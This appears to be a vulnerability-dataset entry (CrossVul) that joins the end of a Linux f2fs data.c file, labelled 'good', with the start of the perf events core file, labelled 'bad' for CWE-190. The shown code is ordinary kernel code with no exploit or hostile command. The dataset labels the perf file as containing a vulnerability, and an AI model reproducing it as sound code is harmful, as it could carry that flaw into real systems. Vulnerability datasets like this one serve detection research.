f2fs_wait_on_encrypted_page_writeback(sbi, blkaddr);
if (len == PAGE_SIZE || PageUptodate(page))
return 0;
if (!(pos & (PAGE_SIZE - 1)) && (pos + len) >= i_size_read(inode)) {
zero_user_segment(page, len, PAGE_SIZE);
return 0;
}
if (blkaddr == NEW_ADDR) {
zero_user_segment(page, 0, PAGE_SIZE);
SetPageUptodate(page);
} else {
struct bio *bio;
bio = f2fs_grab_bio(inode, blkaddr, 1);
if (IS_ERR(bio)) {
err = PTR_ERR(bio);
goto fail;
}
bio->bi_opf = REQ_OP_READ;
if (bio_add_page(bio, page, PAGE_SIZE, 0) < PAGE_SIZE) {
bio_put(bio);
err = -EFAULT;
goto fail;
}
__submit_bio(sbi, bio, DATA);
lock_page(page);
if (unlikely(page->mapping != mapping)) {
f2fs_put_page(page, 1);
goto repeat;
}
if (unlikely(!PageUptodate(page))) {
err = -EIO;
goto fail;
}
}
return 0;
fail:
f2fs_put_page(page, 1);
f2fs_write_failed(mapping, pos + len);
return err;
}
static int f2fs_write_end(struct file *file,
struct address_space *mapping,
loff_t pos, unsigned len, unsigned copied,
struct page *page, void *fsdata)
{
struct inode *inode = page->mapping->host;
trace_f2fs_write_end(inode, pos, len, copied);
/*
* This should come from len == PAGE_SIZE, and we expect copied
* to be PAGE_SIZE. Otherwise, we treat it as zero copied and
* let generic_perform_write() try to copy data again through copied=0.
*/
if (!PageUptodate(page)) {
if (unlikely(copied != len))
copied = 0;
else
SetPageUptodate(page);
}
if (!copied)
goto unlock_out;
set_page_dirty(page);
if (pos + copied > i_size_read(inode))
f2fs_i_size_write(inode, pos + copied);
unlock_out:
f2fs_put_page(page, 1);
f2fs_update_time(F2FS_I_SB(inode), REQ_TIME);
return copied;
}
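/* Direct I/O requires both the file offset and the iovec to be block aligned. */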
static int check_direct_IO(struct inode *inode, struct iov_iter *iter,
loff_t offset)
{
unsigned blocksize_mask = inode->i_sb->s_blocksize - 1;
if (offset & blocksize_mask)
return -EINVAL;
if (iov_iter_alignment(iter) & blocksize_mask)
return -EINVAL;
return 0;
}
static ssize_t f2fs_direct_IO(struct kiocb *iocb, struct iov_iter *iter)
{
struct address_space *mapping = iocb->ki_filp->f_mapping;
struct inode *inode = mapping->host;
size_t count = iov_iter_count(iter);
loff_t offset = iocb->ki_pos;
int rw = iov_iter_rw(iter);
int err;
err = check_direct_IO(inode, iter, offset);
if (err)
return err;
if (__force_buffered_io(inode, rw))
return 0;
trace_f2fs_direct_IO_enter(inode, offset, count, rw);
down_read(&F2FS_I(inode)->dio_rwsem[rw]);
err = blockdev_direct_IO(iocb, inode, iter, get_data_block_dio);
up_read(&F2FS_I(inode)->dio_rwsem[rw]);
if (rw == WRITE) {
if (err > 0)
set_inode_flag(inode, FI_UPDATE_WRITE);
else if (err < 0)
f2fs_write_failed(mapping, offset + count);
}
trace_f2fs_direct_IO_exit(inode, offset, count, rw, err);
return err;
}
void f2fs_invalidate_page(struct page *page, unsigned int offset,
unsigned int length)
{
struct inode *inode = page->mapping->host;
struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
if (inode->i_ino >= F2FS_ROOT_INO(sbi) &&
(offset % PAGE_SIZE || length != PAGE_SIZE))
return;
if (PageDirty(page)) {
if (inode->i_ino == F2FS_META_INO(sbi)) {
dec_page_count(sbi, F2FS_DIRTY_META);
} else if (inode->i_ino == F2FS_NODE_INO(sbi)) {
dec_page_count(sbi, F2FS_DIRTY_NODES);
} else {
inode_dec_dirty_pages(inode);
remove_dirty_inode(inode);
}
}
/* This is an atomic written page, keep it Private */
if (IS_ATOMIC_WRITTEN_PAGE(page))
return;
set_page_private(page, 0);
ClearPagePrivate(page);
}
int f2fs_release_page(struct page *page, gfp_t wait)
{
/* If this is a dirty page, keep PagePrivate */
if (PageDirty(page))
return 0;
/* This is an atomic written page, keep it Private */
if (IS_ATOMIC_WRITTEN_PAGE(page))
return 0;
set_page_private(page, 0);
ClearPagePrivate(page);
return 1;
}
/*
* This was copied from __set_page_dirty_buffers which gives higher performance
* on very high-speed storage (e.g., pmem).
*/
void f2fs_set_page_dirty_nobuffers(struct page *page)
{
struct address_space *mapping = page->mapping;
unsigned long flags;
if (unlikely(!mapping))
return;
spin_lock(&mapping->private_lock);
lock_page_memcg(page);
SetPageDirty(page);
spin_unlock(&mapping->private_lock);
spin_lock_irqsave(&mapping->tree_lock, flags);
WARN_ON_ONCE(!PageUptodate(page));
account_page_dirtied(page, mapping);
radix_tree_tag_set(&mapping->page_tree,
page_index(page), PAGECACHE_TAG_DIRTY);
spin_unlock_irqrestore(&mapping->tree_lock, flags);
unlock_page_memcg(page);
__mark_inode_dirty(mapping->host, I_DIRTY_PAGES);
return;
}
static int f2fs_set_data_page_dirty(struct page *page)
{
struct address_space *mapping = page->mapping;
struct inode *inode = mapping->host;
trace_f2fs_set_page_dirty(page, DATA);
if (!PageUptodate(page))
SetPageUptodate(page);
if (f2fs_is_atomic_file(inode) && !f2fs_is_commit_atomic_write(inode)) {
if (!IS_ATOMIC_WRITTEN_PAGE(page)) {
register_inmem_page(inode, page);
return 1;
}
/*
* This page has already been registered, so we just
* return here.
*/
return 0;
}
if (!PageDirty(page)) {
f2fs_set_page_dirty_nobuffers(page);
update_dirty_page(inode, page);
return 1;
}
return 0;
}
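/*
 * ->bmap callback: inline-data files have no block mapping, and dirty pages
 * are flushed first so that the returned block number reflects on-disk state.
 */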
static sector_t f2fs_bmap(struct address_space *mapping, sector_t block)
{
struct inode *inode = mapping->host;
if (f2fs_has_inline_data(inode))
return 0;
/* make sure allocating whole blocks */
if (mapping_tagged(mapping, PAGECACHE_TAG_DIRTY))
filemap_write_and_wait(mapping);
return generic_block_bmap(mapping, block, get_data_block_bmap);
}
#ifdef CONFIG_MIGRATION
#include <linux/migrate.h>
int f2fs_migrate_page(struct address_space *mapping,
struct page *newpage, struct page *page, enum migrate_mode mode)
{
int rc, extra_count;
struct f2fs_inode_info *fi = F2FS_I(mapping->host);
bool atomic_written = IS_ATOMIC_WRITTEN_PAGE(page);
BUG_ON(PageWriteback(page));
/* migrating an atomic written page is safe with the inmem_lock held */
if (atomic_written && !mutex_trylock(&fi->inmem_lock))
return -EAGAIN;
/*
* A reference is expected if PagePrivate is set when the mapping is moved;
* however, F2FS breaks this rule to maintain dirty page counts when
* truncating pages. So adjusting 'extra_count' here makes it work.
*/
extra_count = (atomic_written ? 1 : 0) - page_has_private(page);
rc = migrate_page_move_mapping(mapping, newpage,
page, NULL, mode, extra_count);
if (rc != MIGRATEPAGE_SUCCESS) {
if (atomic_written)
mutex_unlock(&fi->inmem_lock);
return rc;
}
if (atomic_written) {
struct inmem_pages *cur;
list_for_each_entry(cur, &fi->inmem_pages, list)
if (cur->page == page) {
cur->page = newpage;
break;
}
mutex_unlock(&fi->inmem_lock);
put_page(page);
get_page(newpage);
}
if (PagePrivate(page))
SetPagePrivate(newpage);
set_page_private(newpage, page_private(page));
migrate_page_copy(newpage, page);
return MIGRATEPAGE_SUCCESS;
}
#endif
const struct address_space_operations f2fs_dblock_aops = {
.readpage = f2fs_read_data_page,
.readpages = f2fs_read_data_pages,
.writepage = f2fs_write_data_page,
.writepages = f2fs_write_data_pages,
.write_begin = f2fs_write_begin,
.write_end = f2fs_write_end,
.set_page_dirty = f2fs_set_data_page_dirty,
.invalidatepage = f2fs_invalidate_page,
.releasepage = f2fs_release_page,
.direct_IO = f2fs_direct_IO,
.bmap = f2fs_bmap,
#ifdef CONFIG_MIGRATION
.migratepage = f2fs_migrate_page,
#endif
};
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_3028_0 |
crossvul-cpp_data_bad_3027_0 | /*
* Performance events core code:
*
* Copyright (C) 2008 Thomas Gleixner <tglx@linutronix.de>
* Copyright (C) 2008-2011 Red Hat, Inc., Ingo Molnar
* Copyright (C) 2008-2011 Red Hat, Inc., Peter Zijlstra
* Copyright © 2009 Paul Mackerras, IBM Corp. <paulus@au1.ibm.com>
*
* For licensing details see kernel-base/COPYING
*/
#include <linux/fs.h>
#include <linux/mm.h>
#include <linux/cpu.h>
#include <linux/smp.h>
#include <linux/idr.h>
#include <linux/file.h>
#include <linux/poll.h>
#include <linux/slab.h>
#include <linux/hash.h>
#include <linux/tick.h>
#include <linux/sysfs.h>
#include <linux/dcache.h>
#include <linux/percpu.h>
#include <linux/ptrace.h>
#include <linux/reboot.h>
#include <linux/vmstat.h>
#include <linux/device.h>
#include <linux/export.h>
#include <linux/vmalloc.h>
#include <linux/hardirq.h>
#include <linux/rculist.h>
#include <linux/uaccess.h>
#include <linux/syscalls.h>
#include <linux/anon_inodes.h>
#include <linux/kernel_stat.h>
#include <linux/cgroup.h>
#include <linux/perf_event.h>
#include <linux/trace_events.h>
#include <linux/hw_breakpoint.h>
#include <linux/mm_types.h>
#include <linux/module.h>
#include <linux/mman.h>
#include <linux/compat.h>
#include <linux/bpf.h>
#include <linux/filter.h>
#include <linux/namei.h>
#include <linux/parser.h>
#include "internal.h"
#include <asm/irq_regs.h>
typedef int (*remote_function_f)(void *);
struct remote_function_call {
struct task_struct *p;
remote_function_f func;
void *info;
int ret;
};
static void remote_function(void *data)
{
struct remote_function_call *tfc = data;
struct task_struct *p = tfc->p;
if (p) {
/* -EAGAIN */
if (task_cpu(p) != smp_processor_id())
return;
/*
* Now that we're on the right CPU with IRQs disabled, we can test
* if we hit the right task without races.
*/
tfc->ret = -ESRCH; /* No such (running) process */
if (p != current)
return;
}
tfc->ret = tfc->func(tfc->info);
}
/**
* task_function_call - call a function on the cpu on which a task runs
* @p: the task to evaluate
* @func: the function to be called
* @info: the function call argument
*
* Calls the function @func when the task is currently running. This might
* be on the current CPU, in which case the function is called directly.
*
* returns: @func return value, or
* -ESRCH - when the process isn't running
* -EAGAIN - when the process moved away
*/
static int
task_function_call(struct task_struct *p, remote_function_f func, void *info)
{
struct remote_function_call data = {
.p = p,
.func = func,
.info = info,
.ret = -EAGAIN,
};
int ret;
do {
ret = smp_call_function_single(task_cpu(p), remote_function, &data, 1);
if (!ret)
ret = data.ret;
} while (ret == -EAGAIN);
return ret;
}
/**
* cpu_function_call - call a function on the cpu
* @func: the function to be called
* @info: the function call argument
*
* Calls the function @func on the remote cpu.
*
* returns: @func return value or -ENXIO when the cpu is offline
*/
static int cpu_function_call(int cpu, remote_function_f func, void *info)
{
struct remote_function_call data = {
.p = NULL,
.func = func,
.info = info,
.ret = -ENXIO, /* No such CPU */
};
smp_call_function_single(cpu, remote_function, &data, 1);
return data.ret;
}
static inline struct perf_cpu_context *
__get_cpu_context(struct perf_event_context *ctx)
{
return this_cpu_ptr(ctx->pmu->pmu_cpu_context);
}
static void perf_ctx_lock(struct perf_cpu_context *cpuctx,
struct perf_event_context *ctx)
{
raw_spin_lock(&cpuctx->ctx.lock);
if (ctx)
raw_spin_lock(&ctx->lock);
}
static void perf_ctx_unlock(struct perf_cpu_context *cpuctx,
struct perf_event_context *ctx)
{
if (ctx)
raw_spin_unlock(&ctx->lock);
raw_spin_unlock(&cpuctx->ctx.lock);
}
#define TASK_TOMBSTONE ((void *)-1L)
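/* An event whose owner is TASK_TOMBSTONE is treated as a kernel-internal event. */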
static bool is_kernel_event(struct perf_event *event)
{
return READ_ONCE(event->owner) == TASK_TOMBSTONE;
}
/*
* On task ctx scheduling...
*
* When !ctx->nr_events a task context will not be scheduled. This means
* we can disable the scheduler hooks (for performance) without leaving
* pending task ctx state.
*
* This however results in two special cases:
*
* - removing the last event from a task ctx; this is relatively
* straightforward and is done in __perf_remove_from_context.
*
* - adding the first event to a task ctx; this is tricky because we cannot
* rely on ctx->is_active and therefore cannot use event_function_call().
* See perf_install_in_context().
*
* If ctx->nr_events, then ctx->is_active and cpuctx->task_ctx are set.
*/
typedef void (*event_f)(struct perf_event *, struct perf_cpu_context *,
struct perf_event_context *, void *);
struct event_function_struct {
struct perf_event *event;
event_f func;
void *data;
};
static int event_function(void *info)
{
struct event_function_struct *efs = info;
struct perf_event *event = efs->event;
struct perf_event_context *ctx = event->ctx;
struct perf_cpu_context *cpuctx = __get_cpu_context(ctx);
struct perf_event_context *task_ctx = cpuctx->task_ctx;
int ret = 0;
WARN_ON_ONCE(!irqs_disabled());
perf_ctx_lock(cpuctx, task_ctx);
/*
* Since we do the IPI call without holding ctx->lock things can have
* changed, double check we hit the task we set out to hit.
*/
if (ctx->task) {
if (ctx->task != current) {
ret = -ESRCH;
goto unlock;
}
/*
* We only use event_function_call() on established contexts,
* and event_function() is only ever called when active (or
* rather, we'll have bailed in task_function_call() or the
* above ctx->task != current test), therefore we must have
* ctx->is_active here.
*/
WARN_ON_ONCE(!ctx->is_active);
/*
* And since we have ctx->is_active, cpuctx->task_ctx must
* match.
*/
WARN_ON_ONCE(task_ctx != ctx);
} else {
WARN_ON_ONCE(&cpuctx->ctx != ctx);
}
efs->func(event, cpuctx, ctx, efs->data);
unlock:
perf_ctx_unlock(cpuctx, task_ctx);
return ret;
}
static void event_function_call(struct perf_event *event, event_f func, void *data)
{
struct perf_event_context *ctx = event->ctx;
struct task_struct *task = READ_ONCE(ctx->task); /* verified in event_function */
struct event_function_struct efs = {
.event = event,
.func = func,
.data = data,
};
if (!event->parent) {
/*
* If this is a !child event, we must hold ctx::mutex to
* stabilize the event->ctx relation. See
* perf_event_ctx_lock().
*/
lockdep_assert_held(&ctx->mutex);
}
if (!task) {
cpu_function_call(event->cpu, event_function, &efs);
return;
}
if (task == TASK_TOMBSTONE)
return;
again:
if (!task_function_call(task, event_function, &efs))
return;
raw_spin_lock_irq(&ctx->lock);
/*
* Reload the task pointer, it might have been changed by
* a concurrent perf_event_context_sched_out().
*/
task = ctx->task;
if (task == TASK_TOMBSTONE) {
raw_spin_unlock_irq(&ctx->lock);
return;
}
if (ctx->is_active) {
raw_spin_unlock_irq(&ctx->lock);
goto again;
}
func(event, NULL, ctx, data);
raw_spin_unlock_irq(&ctx->lock);
}
/*
* Similar to event_function_call() + event_function(), but hard assumes IRQs
* are already disabled and we're on the right CPU.
*/
static void event_function_local(struct perf_event *event, event_f func, void *data)
{
struct perf_event_context *ctx = event->ctx;
struct perf_cpu_context *cpuctx = __get_cpu_context(ctx);
struct task_struct *task = READ_ONCE(ctx->task);
struct perf_event_context *task_ctx = NULL;
WARN_ON_ONCE(!irqs_disabled());
if (task) {
if (task == TASK_TOMBSTONE)
return;
task_ctx = ctx;
}
perf_ctx_lock(cpuctx, task_ctx);
task = ctx->task;
if (task == TASK_TOMBSTONE)
goto unlock;
if (task) {
/*
* We must be either inactive or active and the right task,
* otherwise we're screwed, since we cannot IPI to somewhere
* else.
*/
if (ctx->is_active) {
if (WARN_ON_ONCE(task != current))
goto unlock;
if (WARN_ON_ONCE(cpuctx->task_ctx != ctx))
goto unlock;
}
} else {
WARN_ON_ONCE(&cpuctx->ctx != ctx);
}
func(event, cpuctx, ctx, data);
unlock:
perf_ctx_unlock(cpuctx, task_ctx);
}
#define PERF_FLAG_ALL (PERF_FLAG_FD_NO_GROUP |\
PERF_FLAG_FD_OUTPUT |\
PERF_FLAG_PID_CGROUP |\
PERF_FLAG_FD_CLOEXEC)
/*
* branch priv levels that need permission checks
*/
#define PERF_SAMPLE_BRANCH_PERM_PLM \
(PERF_SAMPLE_BRANCH_KERNEL |\
PERF_SAMPLE_BRANCH_HV)
enum event_type_t {
EVENT_FLEXIBLE = 0x1,
EVENT_PINNED = 0x2,
EVENT_TIME = 0x4,
/* see ctx_resched() for details */
EVENT_CPU = 0x8,
EVENT_ALL = EVENT_FLEXIBLE | EVENT_PINNED,
};
/*
* perf_sched_events : >0 events exist
* perf_cgroup_events: >0 per-cpu cgroup events exist on this cpu
*/
static void perf_sched_delayed(struct work_struct *work);
DEFINE_STATIC_KEY_FALSE(perf_sched_events);
static DECLARE_DELAYED_WORK(perf_sched_work, perf_sched_delayed);
static DEFINE_MUTEX(perf_sched_mutex);
static atomic_t perf_sched_count;
static DEFINE_PER_CPU(atomic_t, perf_cgroup_events);
static DEFINE_PER_CPU(int, perf_sched_cb_usages);
static DEFINE_PER_CPU(struct pmu_event_list, pmu_sb_events);
static atomic_t nr_mmap_events __read_mostly;
static atomic_t nr_comm_events __read_mostly;
static atomic_t nr_task_events __read_mostly;
static atomic_t nr_freq_events __read_mostly;
static atomic_t nr_switch_events __read_mostly;
static LIST_HEAD(pmus);
static DEFINE_MUTEX(pmus_lock);
static struct srcu_struct pmus_srcu;
/*
* perf event paranoia level:
* -1 - not paranoid at all
* 0 - disallow raw tracepoint access for unpriv
* 1 - disallow cpu events for unpriv
* 2 - disallow kernel profiling for unpriv
*/
int sysctl_perf_event_paranoid __read_mostly = 2;
/* Minimum for 512 kiB + 1 user control page */
int sysctl_perf_event_mlock __read_mostly = 512 + (PAGE_SIZE / 1024); /* 'free' kiB per user */
/*
* max perf event sample rate
*/
#define DEFAULT_MAX_SAMPLE_RATE 100000
#define DEFAULT_SAMPLE_PERIOD_NS (NSEC_PER_SEC / DEFAULT_MAX_SAMPLE_RATE)
#define DEFAULT_CPU_TIME_MAX_PERCENT 25
int sysctl_perf_event_sample_rate __read_mostly = DEFAULT_MAX_SAMPLE_RATE;
static int max_samples_per_tick __read_mostly = DIV_ROUND_UP(DEFAULT_MAX_SAMPLE_RATE, HZ);
static int perf_sample_period_ns __read_mostly = DEFAULT_SAMPLE_PERIOD_NS;
static int perf_sample_allowed_ns __read_mostly =
DEFAULT_SAMPLE_PERIOD_NS * DEFAULT_CPU_TIME_MAX_PERCENT / 100;
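/*
 * Recompute the allowed per-sample time budget (in ns) as
 * perf_sample_period_ns * sysctl_perf_cpu_time_max_percent / 100,
 * clamped to at least 1ns.
 */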
static void update_perf_cpu_limits(void)
{
u64 tmp = perf_sample_period_ns;
tmp *= sysctl_perf_cpu_time_max_percent;
tmp = div_u64(tmp, 100);
if (!tmp)
tmp = 1;
WRITE_ONCE(perf_sample_allowed_ns, tmp);
}
static int perf_rotate_context(struct perf_cpu_context *cpuctx);
int perf_proc_update_handler(struct ctl_table *table, int write,
void __user *buffer, size_t *lenp,
loff_t *ppos)
{
int ret = proc_dointvec_minmax(table, write, buffer, lenp, ppos);
if (ret || !write)
return ret;
/*
* If throttling is disabled don't allow the write:
*/
if (sysctl_perf_cpu_time_max_percent == 100 ||
sysctl_perf_cpu_time_max_percent == 0)
return -EINVAL;
max_samples_per_tick = DIV_ROUND_UP(sysctl_perf_event_sample_rate, HZ);
perf_sample_period_ns = NSEC_PER_SEC / sysctl_perf_event_sample_rate;
update_perf_cpu_limits();
return 0;
}
int sysctl_perf_cpu_time_max_percent __read_mostly = DEFAULT_CPU_TIME_MAX_PERCENT;
int perf_cpu_time_max_percent_handler(struct ctl_table *table, int write,
void __user *buffer, size_t *lenp,
loff_t *ppos)
{
int ret = proc_dointvec(table, write, buffer, lenp, ppos);
if (ret || !write)
return ret;
if (sysctl_perf_cpu_time_max_percent == 100 ||
sysctl_perf_cpu_time_max_percent == 0) {
printk(KERN_WARNING
"perf: Dynamic interrupt throttling disabled, can hang your system!\n");
WRITE_ONCE(perf_sample_allowed_ns, 0);
} else {
update_perf_cpu_limits();
}
return 0;
}
/*
* perf samples are done in some very critical code paths (NMIs).
* If they take too much CPU time, the system can lock up and not
* get any real work done. This will drop the sample rate when
* we detect that events are taking too long.
*/
#define NR_ACCUMULATED_SAMPLES 128
static DEFINE_PER_CPU(u64, running_sample_length);
static u64 __report_avg;
static u64 __report_allowed;
static void perf_duration_warn(struct irq_work *w)
{
printk_ratelimited(KERN_INFO
"perf: interrupt took too long (%lld > %lld), lowering "
"kernel.perf_event_max_sample_rate to %d\n",
__report_avg, __report_allowed,
sysctl_perf_event_sample_rate);
}
static DEFINE_IRQ_WORK(perf_duration_work, perf_duration_warn);
void perf_sample_event_took(u64 sample_len_ns)
{
u64 max_len = READ_ONCE(perf_sample_allowed_ns);
u64 running_len;
u64 avg_len;
u32 max;
if (max_len == 0)
return;
/* Decay the counter by 1 average sample. */
running_len = __this_cpu_read(running_sample_length);
running_len -= running_len/NR_ACCUMULATED_SAMPLES;
running_len += sample_len_ns;
__this_cpu_write(running_sample_length, running_len);
/*
* Note: this will be biased artificially low until we have
* seen NR_ACCUMULATED_SAMPLES. Doing it this way keeps us
* from having to maintain a count.
*/
avg_len = running_len/NR_ACCUMULATED_SAMPLES;
if (avg_len <= max_len)
return;
__report_avg = avg_len;
__report_allowed = max_len;
/*
* Compute a throttle threshold 25% below the current duration.
*/
avg_len += avg_len / 4;
max = (TICK_NSEC / 100) * sysctl_perf_cpu_time_max_percent;
if (avg_len < max)
max /= (u32)avg_len;
else
max = 1;
WRITE_ONCE(perf_sample_allowed_ns, avg_len);
WRITE_ONCE(max_samples_per_tick, max);
sysctl_perf_event_sample_rate = max * HZ;
perf_sample_period_ns = NSEC_PER_SEC / sysctl_perf_event_sample_rate;
if (!irq_work_queue(&perf_duration_work)) {
early_printk("perf: interrupt took too long (%lld > %lld), lowering "
"kernel.perf_event_max_sample_rate to %d\n",
__report_avg, __report_allowed,
sysctl_perf_event_sample_rate);
}
}
static atomic64_t perf_event_id;
static void cpu_ctx_sched_out(struct perf_cpu_context *cpuctx,
enum event_type_t event_type);
static void cpu_ctx_sched_in(struct perf_cpu_context *cpuctx,
enum event_type_t event_type,
struct task_struct *task);
static void update_context_time(struct perf_event_context *ctx);
static u64 perf_event_time(struct perf_event *event);
void __weak perf_event_print_debug(void) { }
extern __weak const char *perf_pmu_name(void)
{
return "pmu";
}
static inline u64 perf_clock(void)
{
return local_clock();
}
static inline u64 perf_event_clock(struct perf_event *event)
{
return event->clock();
}
#ifdef CONFIG_CGROUP_PERF
static inline bool
perf_cgroup_match(struct perf_event *event)
{
struct perf_event_context *ctx = event->ctx;
struct perf_cpu_context *cpuctx = __get_cpu_context(ctx);
/* @event doesn't care about cgroup */
if (!event->cgrp)
return true;
/* wants specific cgroup scope but @cpuctx isn't associated with any */
if (!cpuctx->cgrp)
return false;
/*
* Cgroup scoping is recursive. An event enabled for a cgroup is
* also enabled for all its descendant cgroups. If @cpuctx's
* cgroup is a descendant of @event's (the test covers identity
* case), it's a match.
*/
return cgroup_is_descendant(cpuctx->cgrp->css.cgroup,
event->cgrp->css.cgroup);
}
static inline void perf_detach_cgroup(struct perf_event *event)
{
css_put(&event->cgrp->css);
event->cgrp = NULL;
}
static inline int is_cgroup_event(struct perf_event *event)
{
return event->cgrp != NULL;
}
static inline u64 perf_cgroup_event_time(struct perf_event *event)
{
struct perf_cgroup_info *t;
t = per_cpu_ptr(event->cgrp->info, event->cpu);
return t->time;
}
static inline void __update_cgrp_time(struct perf_cgroup *cgrp)
{
struct perf_cgroup_info *info;
u64 now;
now = perf_clock();
info = this_cpu_ptr(cgrp->info);
info->time += now - info->timestamp;
info->timestamp = now;
}
static inline void update_cgrp_time_from_cpuctx(struct perf_cpu_context *cpuctx)
{
struct perf_cgroup *cgrp_out = cpuctx->cgrp;
if (cgrp_out)
__update_cgrp_time(cgrp_out);
}
static inline void update_cgrp_time_from_event(struct perf_event *event)
{
struct perf_cgroup *cgrp;
/*
* ensure we access cgroup data only when needed and
* when we know the cgroup is pinned (css_get)
*/
if (!is_cgroup_event(event))
return;
cgrp = perf_cgroup_from_task(current, event->ctx);
/*
* Do not update time when cgroup is not active
*/
if (cgrp == event->cgrp)
__update_cgrp_time(event->cgrp);
}
static inline void
perf_cgroup_set_timestamp(struct task_struct *task,
struct perf_event_context *ctx)
{
struct perf_cgroup *cgrp;
struct perf_cgroup_info *info;
/*
* ctx->lock held by caller
* ensure we do not access cgroup data
* unless we have the cgroup pinned (css_get)
*/
if (!task || !ctx->nr_cgroups)
return;
cgrp = perf_cgroup_from_task(task, ctx);
info = this_cpu_ptr(cgrp->info);
info->timestamp = ctx->timestamp;
}
static DEFINE_PER_CPU(struct list_head, cgrp_cpuctx_list);
#define PERF_CGROUP_SWOUT 0x1 /* cgroup switch out every event */
#define PERF_CGROUP_SWIN 0x2 /* cgroup switch in events based on task */
/*
* reschedule events based on the cgroup constraint of task.
*
* mode SWOUT : schedule out everything
* mode SWIN : schedule in based on cgroup for next
*/
static void perf_cgroup_switch(struct task_struct *task, int mode)
{
struct perf_cpu_context *cpuctx;
struct list_head *list;
unsigned long flags;
/*
* Disable interrupts and preemption to avoid this CPU's
* cgrp_cpuctx_entry to change under us.
*/
local_irq_save(flags);
list = this_cpu_ptr(&cgrp_cpuctx_list);
list_for_each_entry(cpuctx, list, cgrp_cpuctx_entry) {
WARN_ON_ONCE(cpuctx->ctx.nr_cgroups == 0);
perf_ctx_lock(cpuctx, cpuctx->task_ctx);
perf_pmu_disable(cpuctx->ctx.pmu);
if (mode & PERF_CGROUP_SWOUT) {
cpu_ctx_sched_out(cpuctx, EVENT_ALL);
/*
* must not be done before ctxswout due
* to event_filter_match() in event_sched_out()
*/
cpuctx->cgrp = NULL;
}
if (mode & PERF_CGROUP_SWIN) {
WARN_ON_ONCE(cpuctx->cgrp);
/*
* set cgrp before ctxsw in to allow
* event_filter_match() to not have to pass
* task around.
* We pass cpuctx->ctx to perf_cgroup_from_task()
* because cgroup events are only per-cpu.
*/
cpuctx->cgrp = perf_cgroup_from_task(task,
&cpuctx->ctx);
cpu_ctx_sched_in(cpuctx, EVENT_ALL, task);
}
perf_pmu_enable(cpuctx->ctx.pmu);
perf_ctx_unlock(cpuctx, cpuctx->task_ctx);
}
local_irq_restore(flags);
}
static inline void perf_cgroup_sched_out(struct task_struct *task,
struct task_struct *next)
{
struct perf_cgroup *cgrp1;
struct perf_cgroup *cgrp2 = NULL;
rcu_read_lock();
/*
* we come here when we know perf_cgroup_events > 0
* we do not need to pass the ctx here because we know
* we are holding the rcu lock
*/
cgrp1 = perf_cgroup_from_task(task, NULL);
cgrp2 = perf_cgroup_from_task(next, NULL);
/*
* only schedule out current cgroup events if we know
* that we are switching to a different cgroup. Otherwise,
* do not touch the cgroup events.
*/
if (cgrp1 != cgrp2)
perf_cgroup_switch(task, PERF_CGROUP_SWOUT);
rcu_read_unlock();
}
static inline void perf_cgroup_sched_in(struct task_struct *prev,
struct task_struct *task)
{
struct perf_cgroup *cgrp1;
struct perf_cgroup *cgrp2 = NULL;
rcu_read_lock();
/*
* we come here when we know perf_cgroup_events > 0
* we do not need to pass the ctx here because we know
* we are holding the rcu lock
*/
cgrp1 = perf_cgroup_from_task(task, NULL);
cgrp2 = perf_cgroup_from_task(prev, NULL);
/*
* only need to schedule in cgroup events if we are changing
* cgroup during ctxsw. Cgroup events were not scheduled
* out in the previous ctxsw if that was not the case.
*/
if (cgrp1 != cgrp2)
perf_cgroup_switch(task, PERF_CGROUP_SWIN);
rcu_read_unlock();
}
static inline int perf_cgroup_connect(int fd, struct perf_event *event,
struct perf_event_attr *attr,
struct perf_event *group_leader)
{
struct perf_cgroup *cgrp;
struct cgroup_subsys_state *css;
struct fd f = fdget(fd);
int ret = 0;
if (!f.file)
return -EBADF;
css = css_tryget_online_from_dir(f.file->f_path.dentry,
&perf_event_cgrp_subsys);
if (IS_ERR(css)) {
ret = PTR_ERR(css);
goto out;
}
cgrp = container_of(css, struct perf_cgroup, css);
event->cgrp = cgrp;
/*
* all events in a group must monitor
* the same cgroup because a task belongs
* to only one perf cgroup at a time
*/
if (group_leader && group_leader->cgrp != cgrp) {
perf_detach_cgroup(event);
ret = -EINVAL;
}
out:
fdput(f);
return ret;
}
static inline void
perf_cgroup_set_shadow_time(struct perf_event *event, u64 now)
{
struct perf_cgroup_info *t;
t = per_cpu_ptr(event->cgrp->info, event->cpu);
event->shadow_ctx_time = now - t->timestamp;
}
static inline void
perf_cgroup_defer_enabled(struct perf_event *event)
{
/*
* when the current task's perf cgroup does not match
* the event's, we need to remember to call the
* perf_mark_enable() function the first time a task with
* a matching perf cgroup is scheduled in.
*/
if (is_cgroup_event(event) && !perf_cgroup_match(event))
event->cgrp_defer_enabled = 1;
}
static inline void
perf_cgroup_mark_enabled(struct perf_event *event,
struct perf_event_context *ctx)
{
struct perf_event *sub;
u64 tstamp = perf_event_time(event);
if (!event->cgrp_defer_enabled)
return;
event->cgrp_defer_enabled = 0;
event->tstamp_enabled = tstamp - event->total_time_enabled;
list_for_each_entry(sub, &event->sibling_list, group_entry) {
if (sub->state >= PERF_EVENT_STATE_INACTIVE) {
sub->tstamp_enabled = tstamp - sub->total_time_enabled;
sub->cgrp_defer_enabled = 0;
}
}
}
/*
* Update cpuctx->cgrp so that it is set when first cgroup event is added and
* cleared when last cgroup event is removed.
*/
static inline void
list_update_cgroup_event(struct perf_event *event,
struct perf_event_context *ctx, bool add)
{
struct perf_cpu_context *cpuctx;
struct list_head *cpuctx_entry;
if (!is_cgroup_event(event))
return;
if (add && ctx->nr_cgroups++)
return;
else if (!add && --ctx->nr_cgroups)
return;
/*
* Because cgroup events are always per-cpu events,
* this will always be called from the right CPU.
*/
cpuctx = __get_cpu_context(ctx);
cpuctx_entry = &cpuctx->cgrp_cpuctx_entry;
/* cpuctx->cgrp is NULL unless a cgroup event is active on this CPU. */
if (add) {
list_add(cpuctx_entry, this_cpu_ptr(&cgrp_cpuctx_list));
if (perf_cgroup_from_task(current, ctx) == event->cgrp)
cpuctx->cgrp = event->cgrp;
} else {
list_del(cpuctx_entry);
cpuctx->cgrp = NULL;
}
}
#else /* !CONFIG_CGROUP_PERF */
static inline bool
perf_cgroup_match(struct perf_event *event)
{
return true;
}
static inline void perf_detach_cgroup(struct perf_event *event)
{}
static inline int is_cgroup_event(struct perf_event *event)
{
return 0;
}
static inline u64 perf_cgroup_event_cgrp_time(struct perf_event *event)
{
return 0;
}
static inline void update_cgrp_time_from_event(struct perf_event *event)
{
}
static inline void update_cgrp_time_from_cpuctx(struct perf_cpu_context *cpuctx)
{
}
static inline void perf_cgroup_sched_out(struct task_struct *task,
